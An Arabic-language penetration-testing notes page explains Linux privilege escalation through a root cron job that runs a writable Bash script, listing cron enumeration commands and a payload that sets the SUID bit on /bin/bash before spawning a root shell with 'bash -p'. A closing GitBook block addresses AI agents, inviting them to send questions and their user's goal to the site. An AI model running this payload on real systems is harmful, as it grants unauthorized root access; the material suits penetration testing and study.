> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/privesc/cron-jobs/modified-bash-script-cron-job-linux-privilege-escalation.md).

# مهمة Cron لسكربت Bash معدل - تصعيد امتيازات لينكس

## ما هو

تُنشئ مهام Cron مسارات تصعيد الامتيازات عندما تنفّذ المهام المتكررة الخاصة بالمستخدم الجذر نصوصًا برمجية قابلة للكتابة، أو مسارات نسبية غير آمنة، أو معالجات معرّضة للثغرات. المفتاح هو إثبات أن مستخدمًا منخفض الامتيازات يتحكم في شيء ستقوم مهمة مجدولة ذات امتيازات بتشغيله. تركز هذه الصفحة تحديدًا على **مهام Cron - سكربت معدّل (باش)** وتحافظ على سير الاستغلال بشكل عملي: حدّد الحالة، تحقّق منها بأمان، ثم شغّل أصغر حمولة لازمة لإثبات الأثر.

## الاستكشاف

ابدأ بتأكيد السياق المحلي والتهيئة الخاطئة الدقيقة قبل تشغيل مسار الاستغلال.

```bash
cat /etc/crontab
ls -la /etc/cron.*
systemctl list-timers --all
```

## أمثلة

في هذه الحالة، نجد أن script.sh \*\* قيد التشغيل\*\*:

<figure><img src="/files/01326b0f097d0927eb7067585704e77106dd2860" alt="" width="563"><figcaption></figcaption></figure>

ما سنفعله هو **تعديل** السكربت بالمحتوى التالي:

```bash
sleep 2
chmod u+s /bin/bash
```

نشغّل Bash مع **p** معامل الامتياز:

<figure><img src="/files/63223fe611267fb154db38bd75424f02ca6dbdaf" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/privesc/cron-jobs/modified-bash-script-cron-job-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
